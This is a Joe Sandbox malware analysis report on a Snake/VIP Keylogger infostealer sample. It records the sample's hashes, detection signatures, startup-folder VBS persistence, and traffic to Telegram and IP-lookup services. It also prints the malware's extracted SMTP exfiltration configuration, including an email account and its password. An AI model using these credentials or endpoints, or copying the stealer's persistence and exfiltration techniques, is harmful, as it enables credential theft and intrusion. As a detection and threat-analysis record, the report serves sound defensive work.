Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACT0987789000900.exe

Overview

General Information

Sample name:FACT0987789000900.exe
Analysis ID:1583657
MD5:e4da22458c317595e4bd6712b4728d36
SHA1:111a5c4cbd45bced7c04cbeb5192a9afe178865c
SHA256:f3530f9d52d1ba3ed70cc5d603cf0a83771027cda5fd545206e1688589ef69fd
Tags:exeinfostealermalwareuser-Joker
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FACT0987789000900.exe (PID: 5428 cmdline: "C:\Users\user\Desktop\FACT0987789000900.exe" MD5: E4DA22458C317595E4BD6712B4728D36)
    • juvenile.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\FACT0987789000900.exe" MD5: E4DA22458C317595E4BD6712B4728D36)
      • svchost.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\FACT0987789000900.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 7516 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • juvenile.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" MD5: E4DA22458C317595E4BD6712B4728D36)
      • svchost.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Local\thixolabile\juvenile.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.2543748879.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          Click to see the 61 entries
          SourceRuleDescriptionAuthorStrings
          8.2.svchost.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          6.2.juvenile.exe.3da0000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          8.2.svchost.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 93 88 44 24 2B 88 44 24 2F B0 62 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          11.2.svchost.exe.7d30f20.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            11.2.svchost.exe.7d30f20.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              Click to see the 157 entries

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , ProcessId: 7516, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ParentImage: C:\Users\user\AppData\Local\thixolabile\juvenile.exe, ParentProcessId: 7260, ParentProcessName: juvenile.exe, ProcessCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ProcessId: 7344, ProcessName: svchost.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs" , ProcessId: 7516, ProcessName: wscript.exe
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ParentImage: C:\Users\user\AppData\Local\thixolabile\juvenile.exe, ParentProcessId: 7260, ParentProcessName: juvenile.exe, ProcessCommandLine: "C:\Users\user\Desktop\FACT0987789000900.exe", ProcessId: 7344, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\thixolabile\juvenile.exe, ProcessId: 7260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T09:21:14.784640+010028033053Unknown Traffic192.168.2.749727188.114.96.3443TCP
              2025-01-03T09:21:17.391864+010028033053Unknown Traffic192.168.2.749746188.114.96.3443TCP
              2025-01-03T09:21:20.007393+010028033053Unknown Traffic192.168.2.749768188.114.96.3443TCP
              2025-01-03T09:21:21.295929+010028033053Unknown Traffic192.168.2.749778188.114.96.3443TCP
              2025-01-03T09:21:22.599107+010028033053Unknown Traffic192.168.2.749788188.114.96.3443TCP
              2025-01-03T09:21:24.016481+010028033053Unknown Traffic192.168.2.749797188.114.96.3443TCP
              2025-01-03T09:21:26.402935+010028033053Unknown Traffic192.168.2.749823188.114.96.3443TCP
              2025-01-03T09:21:27.754348+010028033053Unknown Traffic192.168.2.749833188.114.96.3443TCP
              2025-01-03T09:21:30.401435+010028033053Unknown Traffic192.168.2.749853188.114.96.3443TCP
              2025-01-03T09:21:33.174242+010028033053Unknown Traffic192.168.2.749874188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T09:21:12.250715+010028032742Potentially Bad Traffic192.168.2.749710132.226.247.7380TCP
              2025-01-03T09:21:14.219632+010028032742Potentially Bad Traffic192.168.2.749710132.226.247.7380TCP
              2025-01-03T09:21:15.532027+010028032742Potentially Bad Traffic192.168.2.749733132.226.247.7380TCP
              2025-01-03T09:21:24.500797+010028032742Potentially Bad Traffic192.168.2.749802132.226.247.7380TCP
              2025-01-03T09:21:25.813329+010028032742Potentially Bad Traffic192.168.2.749802132.226.247.7380TCP
              2025-01-03T09:21:27.157041+010028032742Potentially Bad Traffic192.168.2.749827132.226.247.7380TCP
              2025-01-03T09:21:28.516421+010028032742Potentially Bad Traffic192.168.2.749838132.226.247.7380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T09:21:25.002783+010018100071Potentially Bad Traffic192.168.2.749806149.154.167.220443TCP
              2025-01-03T09:21:36.930173+010018100071Potentially Bad Traffic192.168.2.749899149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}
              Source: 8.2.svchost.exe.7e00f20.3.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@2wapartments.com", "Password": "diezcansecoinfo24", "Host": "mail.2wapartments.com", "Port": "587", "Version": "4.4"}
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeReversingLabs: Detection: 71%
              Source: FACT0987789000900.exeReversingLabs: Detection: 71%
              Source: FACT0987789000900.exeVirustotal: Detection: 80%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeJoe Sandbox ML: detected
              Source: FACT0987789000900.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: FACT0987789000900.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49899 version: TLS 1.2
              Source: Binary string: _.pdb source: svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: juvenile.exe, 00000006.00000003.1318218958.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 00000006.00000003.1318472638.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445535094.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, juvenile.exe, 0000000A.00000003.1445352586.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D6CA9 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004D6CA9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_004D60DD
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_004D63F9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004DEB60
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DF56F FindFirstFileW,FindClose,3_2_004DF56F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004DF5FA
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004E1B2F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004E1C8A
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004E1F94
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00916CA9 GetFileAttributesW,FindFirstFileW,FindClose,6_2_00916CA9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,6_2_009160DD
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,6_2_009163F9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0091EB60
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0091F5FA
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091F56F FindFirstFileW,FindClose,6_2_0091F56F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00921B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00921B2F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00921C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00921C8A
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00921F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00921F94
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09232834h8_2_09232580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09233206h8_2_09232DE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923CF7Ch8_2_0923CCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09230D10h8_2_09230B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923169Ah8_2_09230B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923D3D4h8_2_0923D128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09233206h8_2_09233134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923D82Ch8_2_0923D580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09233206h8_2_09232DE4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923DC84h8_2_0923D9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_09230040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923FAECh8_2_0923F840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_09230856
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923EDE4h8_2_0923EB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923F23Ch8_2_0923EF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923F694h8_2_0923F3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923E0DCh8_2_0923DE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_09230676
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923E534h8_2_0923E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0923E98Ch8_2_0923E6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_086A0040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AFAECh11_2_086AF840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_086A0856
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086ACF7Ch11_2_086ACCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AD3D4h11_2_086AD128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086A3206h11_2_086A3134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086A3206h11_2_086A2DE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086A3206h11_2_086A2DE2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086ADC84h11_2_086AD9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086A2834h11_2_086A2580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AD82Ch11_2_086AD580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_086A0676
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AE0DCh11_2_086ADE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AE98Ch11_2_086AE6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AE534h11_2_086AE288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AEDE4h11_2_086AEB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086A0D10h11_2_086A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086A169Ah11_2_086A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AF694h11_2_086AF3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 086AF23Ch11_2_086AEF90

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49899 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49806 -> 149.154.167.220:443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 132.226.247.73 80Jump to behavior
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 8.3.svchost.exe.326d000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e90000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.7e00f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.7d30000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.3.svchost.exe.326df20.0.raw.unpack, type: UNPACKEDPE
